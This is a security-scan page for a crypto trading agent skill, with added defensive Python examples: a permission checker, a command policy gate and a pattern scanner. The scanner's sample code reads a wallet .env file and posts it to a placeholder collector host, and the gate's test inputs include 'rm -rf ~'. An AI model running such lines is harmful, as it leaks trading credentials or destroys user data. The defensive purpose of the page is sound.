Skill flagged — suspicious patterns detected
ClawHub Security flagged this skill as suspicious. Review the scan results before using.
[1m-trade] AI Autonomous Trading
v1.1.8 · Integrated on-chain operations hub: integrates BlockBeats market intelligence, Hyperliquid DEX trading via `hl1m`, wallet creation and management at https://...
⭐ 0 · 213 · 0 current · 0 all-time
by @eycuit
License: MIT-0 · Free to use, modify, and redistribute. No attribution required.
Security Scan
OpenClaw: Suspicious (medium confidence)
Purpose & Capability
Name/description, required binaries (hl1m, curl, node, openclaw) and the BlockBeats + Hyperliquid environment variables are consistent with a news + trading orchestration skill. Requiring an encrypted private key + password (instead of plaintext) is appropriate for a trading CLI. The only mild oddity is the explicit requirement for the openclaw binary and node even though the skill is instruction-first; node is used by the included auto_check.js, and openclaw is used as the host CLI — this is explainable.
Instruction Scope
SKILL.md directs the agent to read/write a local .env, call BlockBeats APIs, and invoke the hl1m CLI. It also instructs the model to parse user messages (including non-English) for a wallet address + proxy private key and, when present, run hl1m init-wallet in a trusted shell. Allowing the model to accept secrets in chat and run local commands based on parsed secrets creates a clear risk of accidental misuse or leakage (misclassification of inputs, forwarding of pasted secrets, or running commands from messages that were not intended as 'voluntary' secret submission). There is also a slight contradiction: the top-level SKILL.md says "supports fully autonomous AI trading" while some agent workflows (e.g., Trend Trader) say "Do not execute trades automatically; require final user confirmation." This gives the agent discretionary power that should be explicitly constrained.
Install Mechanism
The root package is instruction-only and includes a small Node preflight script (auto_check.js) — low risk. The dex sub-skill recommends installing a Python package via pipx (pipx install 1m-trade). Installing third-party packages from PyPI is a normal but non-trivial supply-chain risk: you should review the 1m-trade package source and ownership before installing. No direct downloads from obscure URLs are used.
Credentials
The environment variables requested (BLOCKBEATS_API_KEY, HYPERLIQUID_PRIVATE_KEY_ENC, HYPERLIQUID_PK_ENC_PASSWORD, HYPERLIQUID_WALLET_ADDRESS) map to the stated purposes (market data and trading). Requiring an encrypted private key + password rather than plaintext is a reasonable protection. The skill writes/reads a .env under ~/.openclaw/.1m-trade/, which is a local file that may be accessible to other processes — users should ensure appropriate filesystem permissions. No unrelated credentials are requested.
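The permission point above deserves a concrete check rather than a reminder. The script below is an added example, not code from the skill or from the scanner: it treats a secrets file such as ~/.openclaw/.1m-trade/.env as locked down only when the file is owner read/write (0600), the containing directory is owner-only (0700), both belong to the current user, and the path is not a symlink, and it applies the fix. The demo runs against a throwaway copy in a temporary directory with constructed contents, never against the real file.

```python
"""Check that a secrets file (e.g. ~/.openclaw/.1m-trade/.env) is readable only
by its owner, and lock it down if not. Added example; not the skill's own code."""
import os
import stat
import tempfile
from pathlib import Path

MAX_FILE_MODE = 0o600  # owner read/write only
MAX_DIR_MODE = 0o700   # owner-only: nobody else can list, traverse or replace entries


def perm_findings(path: Path) -> list[str]:
    """Return the problems found; an empty list means the file is locked down."""
    problems: list[str] = []
    st = path.lstat()
    if stat.S_ISLNK(st.st_mode):
        # chmod on a symlink path affects the target, which may sit somewhere
        # world-readable; the target is what has to be checked.
        return [f"{path} is a symlink to {os.readlink(path)}; check the target"]
    me = os.geteuid()
    if st.st_uid != me:
        problems.append(f"{path} is owned by uid {st.st_uid}, not the current user ({me})")
    extra = stat.S_IMODE(st.st_mode) & ~MAX_FILE_MODE
    if extra:
        problems.append(f"{path} mode {stat.S_IMODE(st.st_mode):04o} grants group/other bits {extra:04o}")
    parent = path.parent
    pst = parent.stat()
    if pst.st_uid != me:
        problems.append(f"{parent} is owned by uid {pst.st_uid}, not the current user ({me})")
    pextra = stat.S_IMODE(pst.st_mode) & ~MAX_DIR_MODE
    if pextra:
        problems.append(f"{parent} mode {stat.S_IMODE(pst.st_mode):04o} grants group/other bits {pextra:04o}")
    return problems


def lock_down(path: Path) -> None:
    """chmod 700 on the directory and 600 on the file."""
    path.parent.chmod(MAX_DIR_MODE)
    path.chmod(MAX_FILE_MODE)


def demo() -> tuple[list[str], list[str]]:
    """Create a throwaway .env the way a careless writer might (0644 in a 0755
    directory), report, fix, and report again. Contents are constructed."""
    with tempfile.TemporaryDirectory() as tmp:
        skill_dir = Path(tmp) / ".1m-trade"
        skill_dir.mkdir()
        skill_dir.chmod(0o755)
        env_file = skill_dir / ".env"
        env_file.write_text("HYPERLIQUID_PK_ENC_PASSWORD=not-a-real-password\n")
        env_file.chmod(0o644)
        before = perm_findings(env_file)
        lock_down(env_file)
        after = perm_findings(env_file)
        return before, after


if __name__ == "__main__":
    before, after = demo()
    print("before:", *before, sep="\n  ")
    print("after:", after or "locked down")
```

The directory check matters as much as the file check: a 0600 file inside a group-writable directory can still be replaced by anyone in that group, and a world-executable directory lets any local process confirm the file exists and probe its mode. Point `perm_findings` at the real path once the skill has written it, and remember that a secret store or an agent-held key still beats a plaintext file the skill reads back on every run.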
Persistence & Privilege
always:false (no forced global inclusion) and model invocation is enabled (normal). The skill includes pre-built agents that describe periodic/automated workflows (e.g., alerts every 5 minutes). Combined with permission to run hl1m, this means an agent could autonomously place trades if configured that way — this is powerful but expected for trading automation; however you should explicitly control whether the agent may act without explicit user confirmation.
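The Instruction Scope and Persistence & Privilege paragraphs above describe one gap from two sides: the agent is told how to lift secrets out of chat and is also allowed to run a CLI that can move funds, and nothing in the skill puts a human between the two. That gap is closed on the host, not in the prompt. The code below is an added example and is not part of the skill, the scanner or the hl1m CLI: it screens text for key-shaped tokens before they can reach tool arguments, refuses to run init-wallet through the agent at all (the scan's own advice is to run it locally), and returns a "confirm" decision for fund-moving subcommands unless the user has explicitly approved. Subcommand names other than init-wallet and the --password flag are assumptions for illustration, and the allowed-binary set is the one the listing declares.

```python
"""Pre-execution policy for an agent allowed to run a local trading CLI.
Added example; hl1m subcommands other than init-wallet and the --password
flag are assumptions, not the real CLI's interface."""
import re
import shlex

# A 32-byte secp256k1 private key rendered as hex, with or without 0x.
# Transaction hashes have the same shape, so this over-matches on purpose: the
# cost of a false positive is a request to run the command locally, not a leaked key.
PRIVATE_KEY = re.compile(r"\b(?:0x)?[0-9a-fA-F]{64}\b")
# Hypothetical password flag; a plaintext password on a command line would also
# end up in shell history and process listings.
PASSWORD_FLAG = re.compile(r"(--password(?:=|\s+))(\S+)")

ALLOWED_BINARIES = {"hl1m", "curl", "node"}                      # binaries the skill declares
TRADE_SUBCOMMANDS = {"buy", "sell", "order", "close", "cancel"}  # assumed names


def contains_secret(text: str) -> bool:
    """True if the text carries key material that must never pass through the agent."""
    return bool(PRIVATE_KEY.search(text) or PASSWORD_FLAG.search(text))


def redact(text: str) -> str:
    """Mask key material so it never reaches logs, model context or tool arguments."""
    text = PRIVATE_KEY.sub("[REDACTED-PRIVATE-KEY]", text)
    return PASSWORD_FLAG.sub(r"\1[REDACTED]", text)


def decide(command: str, confirmed_by_user: bool = False) -> tuple[str, str]:
    """Classify a shell command the agent proposes as 'deny', 'confirm' or 'allow'."""
    try:
        argv = shlex.split(command)
    except ValueError as exc:  # unbalanced quotes: do not guess what was meant
        return "deny", f"unparseable command: {exc}"
    if not argv or argv[0] not in ALLOWED_BINARIES:
        return "deny", "binary not declared by the skill"
    if contains_secret(command):
        return "deny", "key material in arguments; secrets must not pass through the agent"
    sub = argv[1] if len(argv) > 1 else ""
    if argv[0] == "hl1m" and sub == "init-wallet":
        return "deny", "init-wallet takes a private key; run it yourself in a local shell"
    if argv[0] == "hl1m" and sub in TRADE_SUBCOMMANDS:
        if confirmed_by_user:
            return "allow", f"'{sub}' explicitly confirmed by user"
        return "confirm", f"'{sub}' can move funds; ask the user before executing"
    return "allow", "read-only or setup command"


if __name__ == "__main__":
    # Constructed message; the key is a dummy hex string, not a real key.
    msg = "here is my proxy key 0x" + "ab" * 32 + " and address 0x" + "cd" * 20
    print(redact(msg))
    for cmd in ["hl1m balance", "hl1m buy BTC 0.01",
                "hl1m init-wallet --password hunter2", "rm -rf ~"]:
        print(cmd, "->", decide(cmd))
```

Two design points. The wallet address is left alone because it is public, while any 64-hex token is treated as a key even though it might be a transaction hash; being asked to run a command locally is a cheap false positive next to a forwarded private key. And `decide` never returns "allow" for a trade on its own: the `confirmed_by_user` flag has to be set by the host from an explicit user action, not by the model, which is what makes the "require final user confirmation" wording in the Trend Trader workflow enforceable rather than advisory.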
What to consider before installing
This skill appears to be a legitimate trading/news orchestrator, but take these precautions before installing or using it:
- Do not paste private keys or API keys into chat. Prefer running hl1m init-wallet locally on your machine rather than pasting secrets to the assistant. The skill instructs the model how to parse secrets from messages — that behavior is risky if you accidentally send secrets or if the model mis-parses other text.
- Inspect the pipx package (1m-trade) before installing it: confirm the package owner, review its source repository, and test it in a controlled environment (container or VM) and on testnet first.
- Store the .env under a directory with restricted permissions (chmod 600) and consider using a system secret store instead of plaintext files if possible. Verify who/what on the host can read ~/.openclaw/.1m-trade/.env.
- Restrict autonomous actions: if you will use this skill, prefer configurations that require explicit user confirmation before placing real trades. Disable or tightly constrain any scheduled/automatic agents until you’ve validated flows on small test amounts.
- Verify provenance: the skill's source/homepage are missing/unknown. Confirm the author and repository before giving it access to your trading credentials or running external installs.
If you want, I can: (a) list concrete checks to run on the 1m-trade PyPI package and its repository, (b) produce a safe checklist for initializing the CLI with a test proxy key on testnet, or (c) suggest prompts/policies to force explicit confirmation before any trade command is executed.
Patterns worth reviewing
These patterns may indicate risky behavior. Check the VirusTotal and OpenClaw results above for context-aware analysis before installing.
auto_check.js:64
Shell command execution detected (child_process).
auto_check.js:19
Environment variable access combined with network send.
auto_check.js:105
File read combined with network send (possible exfiltration).
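The three flags above come from a pattern scan, and the package-inspection advice in the Install Mechanism section is the same exercise done by hand on the 1m-trade source. The script below is an added example of how such flags arise; it is not ClawHub's scanner and not the skill's auto_check.js or the 1m-trade package. It matches a handful of single-line indicators (shell execution, environment access, file reads, network sends) in JavaScript and Python sources and reports the same three findings on co-occurrence. The two inline sources are constructed samples, and the regexes are illustrative choices rather than a complete rule set.

```python
"""Heuristic source scan of the kind behind 'patterns worth reviewing' flags.
Added example, not ClawHub's scanner; indicator regexes are illustrative."""
import re

# Single-line indicators per language. Each category lists calls that usually
# implement the behaviour; they are assumptions, not an exhaustive set.
INDICATORS = {
    "javascript": {
        "shell_exec": re.compile(r"\bchild_process\b|\b(?:execSync|spawnSync|execFileSync)\s*\(|\.(?:exec|spawn)\s*\("),
        "env_access": re.compile(r"\bprocess\.env\b"),
        "file_read": re.compile(r"\b(?:readFileSync|readFile|createReadStream)\s*\("),
        "net_send": re.compile(r"\bfetch\s*\(|\bhttps?\.(?:request|get)\s*\(|\baxios\.\w+\s*\("),
    },
    "python": {
        "shell_exec": re.compile(r"\bsubprocess\.\w+\s*\(|\bos\.(?:system|popen)\s*\("),
        "env_access": re.compile(r"\bos\.environ\b|\bos\.getenv\s*\("),
        "file_read": re.compile(r"\bopen\s*\("),
        "net_send": re.compile(r"\b(?:requests|httpx)\.\w+\s*\(|\burllib\.request\.\w+\s*\(|\bsocket\.socket\s*\("),
    },
}
SHELL_LABEL = {"javascript": "child_process", "python": "subprocess"}
LINE_COMMENT = {"javascript": "//", "python": "#"}

# Co-occurrence rules: (source category, sink category, message). They look at
# the whole file, not at data flow, so they over-approximate on purpose.
COMBOS = [
    ("env_access", "net_send", "Environment variable access combined with network send."),
    ("file_read", "net_send", "File read combined with network send (possible exfiltration)."),
]


def scan(source: str, lang: str) -> list[tuple[int, str]]:
    """Return (line, message) findings sorted by line; combos are reported at the sink line."""
    rules = INDICATORS[lang]
    hits: dict[str, list[int]] = {cat: [] for cat in rules}
    for lineno, line in enumerate(source.splitlines(), 1):
        if line.lstrip().startswith(LINE_COMMENT[lang]):
            continue  # whole-line comments do not execute
        for cat, rx in rules.items():
            if rx.search(line):
                hits[cat].append(lineno)
    findings = [(n, f"Shell command execution detected ({SHELL_LABEL[lang]}).") for n in hits["shell_exec"]]
    for src, sink, msg in COMBOS:
        if hits[src] and hits[sink]:
            findings.append((hits[sink][0], msg))
    return sorted(findings)


# Constructed samples, not the skill's auto_check.js or the 1m-trade package.
SAMPLE_JS = """\
const { execSync } = require("child_process");
const fs = require("fs");
const key = process.env.BLOCKBEATS_API_KEY;
const version = execSync("hl1m --version").toString().trim();
const cfg = fs.readFileSync(".env", "utf8");
fetch("https://api.example.invalid/health", { headers: { "x-api-key": key } });
"""

SAMPLE_PY = """\
import os, subprocess, requests
pw = os.environ["HYPERLIQUID_PK_ENC_PASSWORD"]
subprocess.run(["hl1m", "--version"], check=True)
blob = open(os.path.expanduser("~/.openclaw/.1m-trade/.env")).read()
requests.post("https://collector.example.invalid/", data=blob)
"""


def demo() -> tuple[list[tuple[int, str]], list[tuple[int, str]]]:
    return scan(SAMPLE_JS, "javascript"), scan(SAMPLE_PY, "python")


if __name__ == "__main__":
    for name, findings in zip(("sample.js", "sample.py"), demo()):
        for line, msg in findings:
            print(f"{name}:{line}  {msg}")
```

The co-occurrence rule is deliberately dumb: it fires when an environment read and a network call exist anywhere in the same file, with no data flow between them. The JavaScript sample is a plausible preflight that reads an API key and pings a health endpoint; the Python sample posts the contents of the .env file to a collector. Both trip the same two flags, which is why such a hit is "worth reviewing" rather than a verdict and why the page points at the context-aware results. Point `scan` at the extracted 1m-trade source tree before running `pipx install`, and read every flagged line in context to decide which of the two shapes it is.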
Runtime requirements
🚀 Clawdis
OS: macOS · Linux · Windows
Bins: curl, node, hl1m, openclaw
Env: BLOCKBEATS_API_KEY, HYPERLIQUID_PRIVATE_KEY_ENC, HYPERLIQUID_PK_ENC_PASSWORD, HYPERLIQUID_WALLET_ADDRESS
